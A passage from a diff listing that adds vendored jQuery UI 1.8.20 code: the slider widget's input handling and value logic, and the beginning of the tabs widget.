.addClass( "ui-slider" +
|
10110 |
+
" ui-slider-" + this.orientation +
|
10111 |
+
" ui-widget" +
|
10112 |
+
" ui-widget-content" +
|
10113 |
+
" ui-corner-all" +
|
10114 |
+
( o.disabled ? " ui-slider-disabled ui-disabled" : "" ) );
|
10115 |
+
|
10116 |
+
this.range = $([]);
|
10117 |
+
|
10118 |
+
if ( o.range ) {
|
10119 |
+
if ( o.range === true ) {
|
10120 |
+
if ( !o.values ) {
|
10121 |
+
o.values = [ this._valueMin(), this._valueMin() ];
|
10122 |
+
}
|
10123 |
+
if ( o.values.length && o.values.length !== 2 ) {
|
10124 |
+
o.values = [ o.values[0], o.values[0] ];
|
10125 |
+
}
|
10126 |
+
}
|
10127 |
+
|
10128 |
+
this.range = $( "<div></div>" )
|
10129 |
+
.appendTo( this.element )
|
10130 |
+
.addClass( "ui-slider-range" +
|
10131 |
+
// note: this isn't the most fittingly semantic framework class for this element,
|
10132 |
+
// but worked best visually with a variety of themes
|
10133 |
+
" ui-widget-header" +
|
10134 |
+
( ( o.range === "min" || o.range === "max" ) ? " ui-slider-range-" + o.range : "" ) );
|
10135 |
+
}
|
10136 |
+
|
10137 |
+
for ( var i = existingHandles.length; i < handleCount; i += 1 ) {
|
10138 |
+
handles.push( handle );
|
10139 |
+
}
|
10140 |
+
|
10141 |
+
this.handles = existingHandles.add( $( handles.join( "" ) ).appendTo( self.element ) );
|
10142 |
+
|
10143 |
+
this.handle = this.handles.eq( 0 );
|
10144 |
+
|
10145 |
+
this.handles.add( this.range ).filter( "a" )
|
10146 |
+
.click(function( event ) {
|
10147 |
+
event.preventDefault();
|
10148 |
+
})
|
10149 |
+
.hover(function() {
|
10150 |
+
if ( !o.disabled ) {
|
10151 |
+
$( this ).addClass( "ui-state-hover" );
|
10152 |
+
}
|
10153 |
+
}, function() {
|
10154 |
+
$( this ).removeClass( "ui-state-hover" );
|
10155 |
+
})
|
10156 |
+
.focus(function() {
|
10157 |
+
if ( !o.disabled ) {
|
10158 |
+
$( ".ui-slider .ui-state-focus" ).removeClass( "ui-state-focus" );
|
10159 |
+
$( this ).addClass( "ui-state-focus" );
|
10160 |
+
} else {
|
10161 |
+
$( this ).blur();
|
10162 |
+
}
|
10163 |
+
})
|
10164 |
+
.blur(function() {
|
10165 |
+
$( this ).removeClass( "ui-state-focus" );
|
10166 |
+
});
|
10167 |
+
|
10168 |
+
this.handles.each(function( i ) {
|
10169 |
+
$( this ).data( "index.ui-slider-handle", i );
|
10170 |
+
});
|
10171 |
+
|
10172 |
+
this.handles
|
10173 |
+
.keydown(function( event ) {
|
10174 |
+
var index = $( this ).data( "index.ui-slider-handle" ),
|
10175 |
+
allowed,
|
10176 |
+
curVal,
|
10177 |
+
newVal,
|
10178 |
+
step;
|
10179 |
+
|
10180 |
+
if ( self.options.disabled ) {
|
10181 |
+
return;
|
10182 |
+
}
|
10183 |
+
|
10184 |
+
switch ( event.keyCode ) {
|
10185 |
+
case $.ui.keyCode.HOME:
|
10186 |
+
case $.ui.keyCode.END:
|
10187 |
+
case $.ui.keyCode.PAGE_UP:
|
10188 |
+
case $.ui.keyCode.PAGE_DOWN:
|
10189 |
+
case $.ui.keyCode.UP:
|
10190 |
+
case $.ui.keyCode.RIGHT:
|
10191 |
+
case $.ui.keyCode.DOWN:
|
10192 |
+
case $.ui.keyCode.LEFT:
|
10193 |
+
event.preventDefault();
|
10194 |
+
if ( !self._keySliding ) {
|
10195 |
+
self._keySliding = true;
|
10196 |
+
$( this ).addClass( "ui-state-active" );
|
10197 |
+
allowed = self._start( event, index );
|
10198 |
+
if ( allowed === false ) {
|
10199 |
+
return;
|
10200 |
+
}
|
10201 |
+
}
|
10202 |
+
break;
|
10203 |
+
}
|
10204 |
+
|
10205 |
+
step = self.options.step;
|
10206 |
+
if ( self.options.values && self.options.values.length ) {
|
10207 |
+
curVal = newVal = self.values( index );
|
10208 |
+
} else {
|
10209 |
+
curVal = newVal = self.value();
|
10210 |
+
}
|
10211 |
+
|
10212 |
+
switch ( event.keyCode ) {
|
10213 |
+
case $.ui.keyCode.HOME:
|
10214 |
+
newVal = self._valueMin();
|
10215 |
+
break;
|
10216 |
+
case $.ui.keyCode.END:
|
10217 |
+
newVal = self._valueMax();
|
10218 |
+
break;
|
10219 |
+
case $.ui.keyCode.PAGE_UP:
|
10220 |
+
newVal = self._trimAlignValue( curVal + ( (self._valueMax() - self._valueMin()) / numPages ) );
|
10221 |
+
break;
|
10222 |
+
case $.ui.keyCode.PAGE_DOWN:
|
10223 |
+
newVal = self._trimAlignValue( curVal - ( (self._valueMax() - self._valueMin()) / numPages ) );
|
10224 |
+
break;
|
10225 |
+
case $.ui.keyCode.UP:
|
10226 |
+
case $.ui.keyCode.RIGHT:
|
10227 |
+
if ( curVal === self._valueMax() ) {
|
10228 |
+
return;
|
10229 |
+
}
|
10230 |
+
newVal = self._trimAlignValue( curVal + step );
|
10231 |
+
break;
|
10232 |
+
case $.ui.keyCode.DOWN:
|
10233 |
+
case $.ui.keyCode.LEFT:
|
10234 |
+
if ( curVal === self._valueMin() ) {
|
10235 |
+
return;
|
10236 |
+
}
|
10237 |
+
newVal = self._trimAlignValue( curVal - step );
|
10238 |
+
break;
|
10239 |
+
}
|
10240 |
+
|
10241 |
+
self._slide( event, index, newVal );
|
10242 |
+
})
|
10243 |
+
.keyup(function( event ) {
|
10244 |
+
var index = $( this ).data( "index.ui-slider-handle" );
|
10245 |
+
|
10246 |
+
if ( self._keySliding ) {
|
10247 |
+
self._keySliding = false;
|
10248 |
+
self._stop( event, index );
|
10249 |
+
self._change( event, index );
|
10250 |
+
$( this ).removeClass( "ui-state-active" );
|
10251 |
+
}
|
10252 |
+
|
10253 |
+
});
|
10254 |
+
|
10255 |
+
this._refreshValue();
|
10256 |
+
|
10257 |
+
this._animateOff = false;
|
10258 |
+
},
|
10259 |
+
|
10260 |
+
destroy: function() {
|
10261 |
+
this.handles.remove();
|
10262 |
+
this.range.remove();
|
10263 |
+
|
10264 |
+
this.element
|
10265 |
+
.removeClass( "ui-slider" +
|
10266 |
+
" ui-slider-horizontal" +
|
10267 |
+
" ui-slider-vertical" +
|
10268 |
+
" ui-slider-disabled" +
|
10269 |
+
" ui-widget" +
|
10270 |
+
" ui-widget-content" +
|
10271 |
+
" ui-corner-all" )
|
10272 |
+
.removeData( "slider" )
|
10273 |
+
.unbind( ".slider" );
|
10274 |
+
|
10275 |
+
this._mouseDestroy();
|
10276 |
+
|
10277 |
+
return this;
|
10278 |
+
},
|
10279 |
+
|
10280 |
+
_mouseCapture: function( event ) {
|
10281 |
+
var o = this.options,
|
10282 |
+
position,
|
10283 |
+
normValue,
|
10284 |
+
distance,
|
10285 |
+
closestHandle,
|
10286 |
+
self,
|
10287 |
+
index,
|
10288 |
+
allowed,
|
10289 |
+
offset,
|
10290 |
+
mouseOverHandle;
|
10291 |
+
|
10292 |
+
if ( o.disabled ) {
|
10293 |
+
return false;
|
10294 |
+
}
|
10295 |
+
|
10296 |
+
this.elementSize = {
|
10297 |
+
width: this.element.outerWidth(),
|
10298 |
+
height: this.element.outerHeight()
|
10299 |
+
};
|
10300 |
+
this.elementOffset = this.element.offset();
|
10301 |
+
|
10302 |
+
position = { x: event.pageX, y: event.pageY };
|
10303 |
+
normValue = this._normValueFromMouse( position );
|
10304 |
+
distance = this._valueMax() - this._valueMin() + 1;
|
10305 |
+
self = this;
|
10306 |
+
this.handles.each(function( i ) {
|
10307 |
+
var thisDistance = Math.abs( normValue - self.values(i) );
|
10308 |
+
if ( distance > thisDistance ) {
|
10309 |
+
distance = thisDistance;
|
10310 |
+
closestHandle = $( this );
|
10311 |
+
index = i;
|
10312 |
+
}
|
10313 |
+
});
|
10314 |
+
|
10315 |
+
// workaround for bug #3736 (if both handles of a range are at 0,
|
10316 |
+
// the first is always used as the one with least distance,
|
10317 |
+
// and moving it is obviously prevented by preventing negative ranges)
|
10318 |
+
if( o.range === true && this.values(1) === o.min ) {
|
10319 |
+
index += 1;
|
10320 |
+
closestHandle = $( this.handles[index] );
|
10321 |
+
}
|
10322 |
+
|
10323 |
+
allowed = this._start( event, index );
|
10324 |
+
if ( allowed === false ) {
|
10325 |
+
return false;
|
10326 |
+
}
|
10327 |
+
this._mouseSliding = true;
|
10328 |
+
|
10329 |
+
self._handleIndex = index;
|
10330 |
+
|
10331 |
+
closestHandle
|
10332 |
+
.addClass( "ui-state-active" )
|
10333 |
+
.focus();
|
10334 |
+
|
10335 |
+
offset = closestHandle.offset();
|
10336 |
+
mouseOverHandle = !$( event.target ).parents().andSelf().is( ".ui-slider-handle" );
|
10337 |
+
this._clickOffset = mouseOverHandle ? { left: 0, top: 0 } : {
|
10338 |
+
left: event.pageX - offset.left - ( closestHandle.width() / 2 ),
|
10339 |
+
top: event.pageY - offset.top -
|
10340 |
+
( closestHandle.height() / 2 ) -
|
10341 |
+
( parseInt( closestHandle.css("borderTopWidth"), 10 ) || 0 ) -
|
10342 |
+
( parseInt( closestHandle.css("borderBottomWidth"), 10 ) || 0) +
|
10343 |
+
( parseInt( closestHandle.css("marginTop"), 10 ) || 0)
|
10344 |
+
};
|
10345 |
+
|
10346 |
+
if ( !this.handles.hasClass( "ui-state-hover" ) ) {
|
10347 |
+
this._slide( event, index, normValue );
|
10348 |
+
}
|
10349 |
+
this._animateOff = true;
|
10350 |
+
return true;
|
10351 |
+
},
|
10352 |
+
|
10353 |
+
_mouseStart: function( event ) {
|
10354 |
+
return true;
|
10355 |
+
},
|
10356 |
+
|
10357 |
+
_mouseDrag: function( event ) {
|
10358 |
+
var position = { x: event.pageX, y: event.pageY },
|
10359 |
+
normValue = this._normValueFromMouse( position );
|
10360 |
+
|
10361 |
+
this._slide( event, this._handleIndex, normValue );
|
10362 |
+
|
10363 |
+
return false;
|
10364 |
+
},
|
10365 |
+
|
10366 |
+
_mouseStop: function( event ) {
|
10367 |
+
this.handles.removeClass( "ui-state-active" );
|
10368 |
+
this._mouseSliding = false;
|
10369 |
+
|
10370 |
+
this._stop( event, this._handleIndex );
|
10371 |
+
this._change( event, this._handleIndex );
|
10372 |
+
|
10373 |
+
this._handleIndex = null;
|
10374 |
+
this._clickOffset = null;
|
10375 |
+
this._animateOff = false;
|
10376 |
+
|
10377 |
+
return false;
|
10378 |
+
},
|
10379 |
+
|
10380 |
+
_detectOrientation: function() {
|
10381 |
+
this.orientation = ( this.options.orientation === "vertical" ) ? "vertical" : "horizontal";
|
10382 |
+
},
|
10383 |
+
|
10384 |
+
_normValueFromMouse: function( position ) {
|
10385 |
+
var pixelTotal,
|
10386 |
+
pixelMouse,
|
10387 |
+
percentMouse,
|
10388 |
+
valueTotal,
|
10389 |
+
valueMouse;
|
10390 |
+
|
10391 |
+
if ( this.orientation === "horizontal" ) {
|
10392 |
+
pixelTotal = this.elementSize.width;
|
10393 |
+
pixelMouse = position.x - this.elementOffset.left - ( this._clickOffset ? this._clickOffset.left : 0 );
|
10394 |
+
} else {
|
10395 |
+
pixelTotal = this.elementSize.height;
|
10396 |
+
pixelMouse = position.y - this.elementOffset.top - ( this._clickOffset ? this._clickOffset.top : 0 );
|
10397 |
+
}
|
10398 |
+
|
10399 |
+
percentMouse = ( pixelMouse / pixelTotal );
|
10400 |
+
if ( percentMouse > 1 ) {
|
10401 |
+
percentMouse = 1;
|
10402 |
+
}
|
10403 |
+
if ( percentMouse < 0 ) {
|
10404 |
+
percentMouse = 0;
|
10405 |
+
}
|
10406 |
+
if ( this.orientation === "vertical" ) {
|
10407 |
+
percentMouse = 1 - percentMouse;
|
10408 |
+
}
|
10409 |
+
|
10410 |
+
valueTotal = this._valueMax() - this._valueMin();
|
10411 |
+
valueMouse = this._valueMin() + percentMouse * valueTotal;
|
10412 |
+
|
10413 |
+
return this._trimAlignValue( valueMouse );
|
10414 |
+
},
|
10415 |
+
|
10416 |
+
_start: function( event, index ) {
|
10417 |
+
var uiHash = {
|
10418 |
+
handle: this.handles[ index ],
|
10419 |
+
value: this.value()
|
10420 |
+
};
|
10421 |
+
if ( this.options.values && this.options.values.length ) {
|
10422 |
+
uiHash.value = this.values( index );
|
10423 |
+
uiHash.values = this.values();
|
10424 |
+
}
|
10425 |
+
return this._trigger( "start", event, uiHash );
|
10426 |
+
},
|
10427 |
+
|
10428 |
+
_slide: function( event, index, newVal ) {
|
10429 |
+
var otherVal,
|
10430 |
+
newValues,
|
10431 |
+
allowed;
|
10432 |
+
|
10433 |
+
if ( this.options.values && this.options.values.length ) {
|
10434 |
+
otherVal = this.values( index ? 0 : 1 );
|
10435 |
+
|
10436 |
+
if ( ( this.options.values.length === 2 && this.options.range === true ) &&
|
10437 |
+
( ( index === 0 && newVal > otherVal) || ( index === 1 && newVal < otherVal ) )
|
10438 |
+
) {
|
10439 |
+
newVal = otherVal;
|
10440 |
+
}
|
10441 |
+
|
10442 |
+
if ( newVal !== this.values( index ) ) {
|
10443 |
+
newValues = this.values();
|
10444 |
+
newValues[ index ] = newVal;
|
10445 |
+
// A slide can be canceled by returning false from the slide callback
|
10446 |
+
allowed = this._trigger( "slide", event, {
|
10447 |
+
handle: this.handles[ index ],
|
10448 |
+
value: newVal,
|
10449 |
+
values: newValues
|
10450 |
+
} );
|
10451 |
+
otherVal = this.values( index ? 0 : 1 );
|
10452 |
+
if ( allowed !== false ) {
|
10453 |
+
this.values( index, newVal, true );
|
10454 |
+
}
|
10455 |
+
}
|
10456 |
+
} else {
|
10457 |
+
if ( newVal !== this.value() ) {
|
10458 |
+
// A slide can be canceled by returning false from the slide callback
|
10459 |
+
allowed = this._trigger( "slide", event, {
|
10460 |
+
handle: this.handles[ index ],
|
10461 |
+
value: newVal
|
10462 |
+
} );
|
10463 |
+
if ( allowed !== false ) {
|
10464 |
+
this.value( newVal );
|
10465 |
+
}
|
10466 |
+
}
|
10467 |
+
}
|
10468 |
+
},
|
10469 |
+
|
10470 |
+
_stop: function( event, index ) {
|
10471 |
+
var uiHash = {
|
10472 |
+
handle: this.handles[ index ],
|
10473 |
+
value: this.value()
|
10474 |
+
};
|
10475 |
+
if ( this.options.values && this.options.values.length ) {
|
10476 |
+
uiHash.value = this.values( index );
|
10477 |
+
uiHash.values = this.values();
|
10478 |
+
}
|
10479 |
+
|
10480 |
+
this._trigger( "stop", event, uiHash );
|
10481 |
+
},
|
10482 |
+
|
10483 |
+
_change: function( event, index ) {
|
10484 |
+
if ( !this._keySliding && !this._mouseSliding ) {
|
10485 |
+
var uiHash = {
|
10486 |
+
handle: this.handles[ index ],
|
10487 |
+
value: this.value()
|
10488 |
+
};
|
10489 |
+
if ( this.options.values && this.options.values.length ) {
|
10490 |
+
uiHash.value = this.values( index );
|
10491 |
+
uiHash.values = this.values();
|
10492 |
+
}
|
10493 |
+
|
10494 |
+
this._trigger( "change", event, uiHash );
|
10495 |
+
}
|
10496 |
+
},
|
10497 |
+
|
10498 |
+
value: function( newValue ) {
|
10499 |
+
if ( arguments.length ) {
|
10500 |
+
this.options.value = this._trimAlignValue( newValue );
|
10501 |
+
this._refreshValue();
|
10502 |
+
this._change( null, 0 );
|
10503 |
+
return;
|
10504 |
+
}
|
10505 |
+
|
10506 |
+
return this._value();
|
10507 |
+
},
|
10508 |
+
|
10509 |
+
values: function( index, newValue ) {
|
10510 |
+
var vals,
|
10511 |
+
newValues,
|
10512 |
+
i;
|
10513 |
+
|
10514 |
+
if ( arguments.length > 1 ) {
|
10515 |
+
this.options.values[ index ] = this._trimAlignValue( newValue );
|
10516 |
+
this._refreshValue();
|
10517 |
+
this._change( null, index );
|
10518 |
+
return;
|
10519 |
+
}
|
10520 |
+
|
10521 |
+
if ( arguments.length ) {
|
10522 |
+
if ( $.isArray( arguments[ 0 ] ) ) {
|
10523 |
+
vals = this.options.values;
|
10524 |
+
newValues = arguments[ 0 ];
|
10525 |
+
for ( i = 0; i < vals.length; i += 1 ) {
|
10526 |
+
vals[ i ] = this._trimAlignValue( newValues[ i ] );
|
10527 |
+
this._change( null, i );
|
10528 |
+
}
|
10529 |
+
this._refreshValue();
|
10530 |
+
} else {
|
10531 |
+
if ( this.options.values && this.options.values.length ) {
|
10532 |
+
return this._values( index );
|
10533 |
+
} else {
|
10534 |
+
return this.value();
|
10535 |
+
}
|
10536 |
+
}
|
10537 |
+
} else {
|
10538 |
+
return this._values();
|
10539 |
+
}
|
10540 |
+
},
|
10541 |
+
|
10542 |
+
_setOption: function( key, value ) {
|
10543 |
+
var i,
|
10544 |
+
valsLength = 0;
|
10545 |
+
|
10546 |
+
if ( $.isArray( this.options.values ) ) {
|
10547 |
+
valsLength = this.options.values.length;
|
10548 |
+
}
|
10549 |
+
|
10550 |
+
$.Widget.prototype._setOption.apply( this, arguments );
|
10551 |
+
|
10552 |
+
switch ( key ) {
|
10553 |
+
case "disabled":
|
10554 |
+
if ( value ) {
|
10555 |
+
this.handles.filter( ".ui-state-focus" ).blur();
|
10556 |
+
this.handles.removeClass( "ui-state-hover" );
|
10557 |
+
this.handles.propAttr( "disabled", true );
|
10558 |
+
this.element.addClass( "ui-disabled" );
|
10559 |
+
} else {
|
10560 |
+
this.handles.propAttr( "disabled", false );
|
10561 |
+
this.element.removeClass( "ui-disabled" );
|
10562 |
+
}
|
10563 |
+
break;
|
10564 |
+
case "orientation":
|
10565 |
+
this._detectOrientation();
|
10566 |
+
this.element
|
10567 |
+
.removeClass( "ui-slider-horizontal ui-slider-vertical" )
|
10568 |
+
.addClass( "ui-slider-" + this.orientation );
|
10569 |
+
this._refreshValue();
|
10570 |
+
break;
|
10571 |
+
case "value":
|
10572 |
+
this._animateOff = true;
|
10573 |
+
this._refreshValue();
|
10574 |
+
this._change( null, 0 );
|
10575 |
+
this._animateOff = false;
|
10576 |
+
break;
|
10577 |
+
case "values":
|
10578 |
+
this._animateOff = true;
|
10579 |
+
this._refreshValue();
|
10580 |
+
for ( i = 0; i < valsLength; i += 1 ) {
|
10581 |
+
this._change( null, i );
|
10582 |
+
}
|
10583 |
+
this._animateOff = false;
|
10584 |
+
break;
|
10585 |
+
}
|
10586 |
+
},
|
10587 |
+
|
10588 |
+
//internal value getter
|
10589 |
+
// _value() returns value trimmed by min and max, aligned by step
|
10590 |
+
_value: function() {
|
10591 |
+
var val = this.options.value;
|
10592 |
+
val = this._trimAlignValue( val );
|
10593 |
+
|
10594 |
+
return val;
|
10595 |
+
},
|
10596 |
+
|
10597 |
+
//internal values getter
|
10598 |
+
// _values() returns array of values trimmed by min and max, aligned by step
|
10599 |
+
// _values( index ) returns single value trimmed by min and max, aligned by step
|
10600 |
+
_values: function( index ) {
|
10601 |
+
var val,
|
10602 |
+
vals,
|
10603 |
+
i;
|
10604 |
+
|
10605 |
+
if ( arguments.length ) {
|
10606 |
+
val = this.options.values[ index ];
|
10607 |
+
val = this._trimAlignValue( val );
|
10608 |
+
|
10609 |
+
return val;
|
10610 |
+
} else {
|
10611 |
+
// .slice() creates a copy of the array
|
10612 |
+
// this copy gets trimmed by min and max and then returned
|
10613 |
+
vals = this.options.values.slice();
|
10614 |
+
for ( i = 0; i < vals.length; i+= 1) {
|
10615 |
+
vals[ i ] = this._trimAlignValue( vals[ i ] );
|
10616 |
+
}
|
10617 |
+
|
10618 |
+
return vals;
|
10619 |
+
}
|
10620 |
+
},
|
10621 |
+
|
10622 |
+
// returns the step-aligned value that val is closest to, between (inclusive) min and max
|
10623 |
+
_trimAlignValue: function( val ) {
|
10624 |
+
if ( val <= this._valueMin() ) {
|
10625 |
+
return this._valueMin();
|
10626 |
+
}
|
10627 |
+
if ( val >= this._valueMax() ) {
|
10628 |
+
return this._valueMax();
|
10629 |
+
}
|
10630 |
+
var step = ( this.options.step > 0 ) ? this.options.step : 1,
|
10631 |
+
valModStep = (val - this._valueMin()) % step,
|
10632 |
+
alignValue = val - valModStep;
|
10633 |
+
|
10634 |
+
if ( Math.abs(valModStep) * 2 >= step ) {
|
10635 |
+
alignValue += ( valModStep > 0 ) ? step : ( -step );
|
10636 |
+
}
|
10637 |
+
|
10638 |
+
// Since JavaScript has problems with large floats, round
|
10639 |
+
// the final value to 5 digits after the decimal point (see #4124)
|
10640 |
+
return parseFloat( alignValue.toFixed(5) );
|
10641 |
+
},
|
10642 |
+
|
10643 |
+
_valueMin: function() {
|
10644 |
+
return this.options.min;
|
10645 |
+
},
|
10646 |
+
|
10647 |
+
_valueMax: function() {
|
10648 |
+
return this.options.max;
|
10649 |
+
},
|
10650 |
+
|
10651 |
+
_refreshValue: function() {
|
10652 |
+
var oRange = this.options.range,
|
10653 |
+
o = this.options,
|
10654 |
+
self = this,
|
10655 |
+
animate = ( !this._animateOff ) ? o.animate : false,
|
10656 |
+
valPercent,
|
10657 |
+
_set = {},
|
10658 |
+
lastValPercent,
|
10659 |
+
value,
|
10660 |
+
valueMin,
|
10661 |
+
valueMax;
|
10662 |
+
|
10663 |
+
if ( this.options.values && this.options.values.length ) {
|
10664 |
+
this.handles.each(function( i, j ) {
|
10665 |
+
valPercent = ( self.values(i) - self._valueMin() ) / ( self._valueMax() - self._valueMin() ) * 100;
|
10666 |
+
_set[ self.orientation === "horizontal" ? "left" : "bottom" ] = valPercent + "%";
|
10667 |
+
$( this ).stop( 1, 1 )[ animate ? "animate" : "css" ]( _set, o.animate );
|
10668 |
+
if ( self.options.range === true ) {
|
10669 |
+
if ( self.orientation === "horizontal" ) {
|
10670 |
+
if ( i === 0 ) {
|
10671 |
+
self.range.stop( 1, 1 )[ animate ? "animate" : "css" ]( { left: valPercent + "%" }, o.animate );
|
10672 |
+
}
|
10673 |
+
if ( i === 1 ) {
|
10674 |
+
self.range[ animate ? "animate" : "css" ]( { width: ( valPercent - lastValPercent ) + "%" }, { queue: false, duration: o.animate } );
|
10675 |
+
}
|
10676 |
+
} else {
|
10677 |
+
if ( i === 0 ) {
|
10678 |
+
self.range.stop( 1, 1 )[ animate ? "animate" : "css" ]( { bottom: ( valPercent ) + "%" }, o.animate );
|
10679 |
+
}
|
10680 |
+
if ( i === 1 ) {
|
10681 |
+
self.range[ animate ? "animate" : "css" ]( { height: ( valPercent - lastValPercent ) + "%" }, { queue: false, duration: o.animate } );
|
10682 |
+
}
|
10683 |
+
}
|
10684 |
+
}
|
10685 |
+
lastValPercent = valPercent;
|
10686 |
+
});
|
10687 |
+
} else {
|
10688 |
+
value = this.value();
|
10689 |
+
valueMin = this._valueMin();
|
10690 |
+
valueMax = this._valueMax();
|
10691 |
+
valPercent = ( valueMax !== valueMin ) ?
|
10692 |
+
( value - valueMin ) / ( valueMax - valueMin ) * 100 :
|
10693 |
+
0;
|
10694 |
+
_set[ self.orientation === "horizontal" ? "left" : "bottom" ] = valPercent + "%";
|
10695 |
+
this.handle.stop( 1, 1 )[ animate ? "animate" : "css" ]( _set, o.animate );
|
10696 |
+
|
10697 |
+
if ( oRange === "min" && this.orientation === "horizontal" ) {
|
10698 |
+
this.range.stop( 1, 1 )[ animate ? "animate" : "css" ]( { width: valPercent + "%" }, o.animate );
|
10699 |
+
}
|
10700 |
+
if ( oRange === "max" && this.orientation === "horizontal" ) {
|
10701 |
+
this.range[ animate ? "animate" : "css" ]( { width: ( 100 - valPercent ) + "%" }, { queue: false, duration: o.animate } );
|
10702 |
+
}
|
10703 |
+
if ( oRange === "min" && this.orientation === "vertical" ) {
|
10704 |
+
this.range.stop( 1, 1 )[ animate ? "animate" : "css" ]( { height: valPercent + "%" }, o.animate );
|
10705 |
+
}
|
10706 |
+
if ( oRange === "max" && this.orientation === "vertical" ) {
|
10707 |
+
this.range[ animate ? "animate" : "css" ]( { height: ( 100 - valPercent ) + "%" }, { queue: false, duration: o.animate } );
|
10708 |
+
}
|
10709 |
+
}
|
10710 |
+
}
|
10711 |
+
|
10712 |
+
});
|
10713 |
+
|
10714 |
+
$.extend( $.ui.slider, {
|
10715 |
+
version: "1.8.20"
|
10716 |
+
});
|
10717 |
+
|
10718 |
+
}(asljQuery));
|
10719 |
+
|
10720 |
+
(function( $, undefined ) {
|
10721 |
+
|
10722 |
+
var tabId = 0,
|
10723 |
+
listId = 0;
|
10724 |
+
|
10725 |
+
function getNextTabId() {
|
10726 |
+
return ++tabId;
|
10727 |
+
}
|
10728 |
+
|
10729 |
+
function getNextListId() {
|
10730 |
+
return ++listId;
|
10731 |
+
}
|
10732 |
+
|
10733 |
+
$.widget( "ui.tabs", {
|
10734 |
+
options: {
|
10735 |
+
add: null,
|
10736 |
+
ajaxOptions: null,
|
10737 |
+
cache: false,
|
10738 |
+
cookie: null, // e.g. { expires: 7, path: '/', domain: 'jquery.com', secure: true }
|
10739 |
+
collapsible: false,
|
10740 |
+
disable: null,
|
10741 |
+
disabled: [],
|
10742 |
+
enable: null,
|
10743 |
+
event: "click",
|
10744 |
+
fx: null, // e.g. { height: 'toggle', opacity: 'toggle', duration: 200 }
|
10745 |
+
idPrefix: "ui-tabs-",
|
10746 |
+
load: null,
|
10747 |
+
panelTemplate: "<div></div>",
|
10748 |
+
remove: null,
|
10749 |
+
select: null,
|
10750 |
+
show: null,
|
10751 |
+
spinner: "<em>Loading…</em>",
|
10752 |
+
tabTemplate: "<li><a href='#{href}'><span>#{label}</span></a></li>"
|
10753 |
+
},
|
10754 |
+
|
10755 |
+
_create: function() {
|
10756 |
+
this._tabify( true );
|
10757 |
+
},
|
10758 |
+
|
10759 |
+
_setOption: function( key, value ) {
|
10760 |
+
if ( key == "selected" ) {
|
10761 |
+
if (this.options.collapsible && value == this.options.selected ) {
|
10762 |
+
return;
|
10763 |
+
}
|
10764 |
+
this.select( value );
|
10765 |
+
} else {
|
10766 |
+
this.options[ key ] = value;
|
10767 |
+
this._tabify();
|
10768 |
+
}
|
10769 |
+
},
|
10770 |
+
|
10771 |
+
_tabId: function( a ) {
|
10772 |
+
return a.title && a.title.replace( /\s/g, "_" ).replace( /[^\w\u00c0-\uFFFF-]/g, "" ) ||
|
10773 |
+
this.options.idPrefix + getNextTabId();
|
10774 |
+
},
|
10775 |
+
|
10776 |
+
_sanitizeSelector: function( hash ) {
|
10777 |
+
// we need this because an id may contain a ":"
|
10778 |
+
return hash.replace( /:/g, "\\:" );
|
10779 |
+
},
|
10780 |
+
|
10781 |
+
_cookie: function() {
|
10782 |
+
var cookie = this.cookie ||
|
10783 |
+
( this.cookie = this.options.cookie.name || "ui-tabs-" + getNextListId() );
|
10784 |
+
return $.cookie.apply( null, [ cookie ].concat( $.makeArray( arguments ) ) );
|
10785 |
+
},
|
10786 |
+
|
10787 |
+
_ui: function( tab, panel ) {
|
10788 |
+
return {
|
10789 |
+
tab: tab,
|
10790 |
+
panel: panel,
|
10791 |
+
index: this.anchors.index( tab )
|
10792 |
+
};
|
10793 |
+
},
|
10794 |
+
|
10795 |
+
_cleanup: function() {
|
10796 |
+
// restore all former loading tabs labels
|
10797 |
+
this.lis.filter( ".ui-state-processing" )
|
10798 |
+
.removeClass( "ui-state-processing" )
|
10799 |
+
.find( "span:data(label.tabs)" )
|
10800 |
+
.each(function() {
|
10801 |
+
var el = $( this );
|
10802 |
+
el.html( el.data( "label.tabs" ) ).removeData( "label.tabs" );
|
10803 |
+
});
|
10804 |
+
},
|
10805 |
+
|
10806 |
+
_tabify: function( init ) {
|
10807 |
+
var self = this,
|
10808 |
+
o = this.options,
|
10809 |
+
fragmentId = /^#.+/; // Safari 2 reports '#' for an empty hash
|
10810 |
+
|
10811 |
+
this.list = this.element.find( "ol,ul" ).eq( 0 );
|
10812 |
+
this.lis = $( " > li:has(a[href])", this.list );
|
10813 |
+
this.anchors = this.lis.map(function() {
|
10814 |
+
return $( "a", this )[ 0 ];
|
10815 |
+
});
|
10816 |
+
this.panels = $( [] );
|
10817 |
+
|
10818 |
+
this.anchors.each(function( i, a ) {
|
10819 |
+
var href = $( a ).attr( "href" );
|
10820 |
+
// For dynamically created HTML that contains a hash as href IE < 8 expands
|
10821 |
+
// such href to the full page url with hash and then misinterprets tab as ajax.
|
10822 |
+
// Same consideration applies for an added tab with a fragment identifier
|
10823 |
+
// since a[href=#fragment-identifier] does unexpectedly not match.
|
10824 |
+
// Thus normalize href attribute...
|
10825 |
+
var hrefBase = href.split( "#" )[ 0 ],
|
10826 |
+
baseEl;
|
10827 |
+
if ( hrefBase && ( hrefBase === location.toString().split( "#" )[ 0 ] ||
|
10828 |
+
( baseEl = $( "base" )[ 0 ]) && hrefBase === baseEl.href ) ) {
|
10829 |
+
href = a.hash;
|
10830 |
+
a.href = href;
|
10831 |
+
}
|
10832 |
+
|
10833 |
+
// inline tab
|
10834 |
+
if ( fragmentId.test( href ) ) {
|
10835 |
+
self.panels = self.panels.add( self.element.find( self._sanitizeSelector( href ) ) );
|
10836 |
+
// remote tab
|
10837 |
+
// prevent loading the page itself if href is just "#"
|
10838 |
+
} else if ( href && href !== "#" ) {
|
10839 |
+
// required for restore on destroy
|
10840 |
+
$.data( a, "href.tabs", href );
|
10841 |
+
|
10842 |
+
// TODO until #3808 is fixed strip fragment identifier from url
|
10843 |
+
// (IE fails to load from such url)
|
10844 |
+
$.data( a, "load.tabs", href.replace( /#.*$/, "" ) );
|
10845 |
+
|
10846 |
+
var id = self._tabId( a );
|
10847 |
+
a.href = "#" + id;
|
10848 |
+
var $panel = self.element.find( "#" + id );
|
10849 |
+
if ( !$panel.length ) {
|
10850 |
+
$panel = $( o.panelTemplate )
|
10851 |
+
.attr( "id", id )
|
10852 |
+
.addClass( "ui-tabs-panel ui-widget-content ui-corner-bottom" )
|
10853 |
+
.insertAfter( self.panels[ i - 1 ] || self.list );
|
10854 |
+
$panel.data( "destroy.tabs", true );
|
10855 |
+
}
|
10856 |
+
self.panels = self.panels.add( $panel );
|
10857 |
+
// invalid tab href
|
10858 |
+
} else {
|
10859 |
+
o.disabled.push( i );
|
10860 |
+
}
|
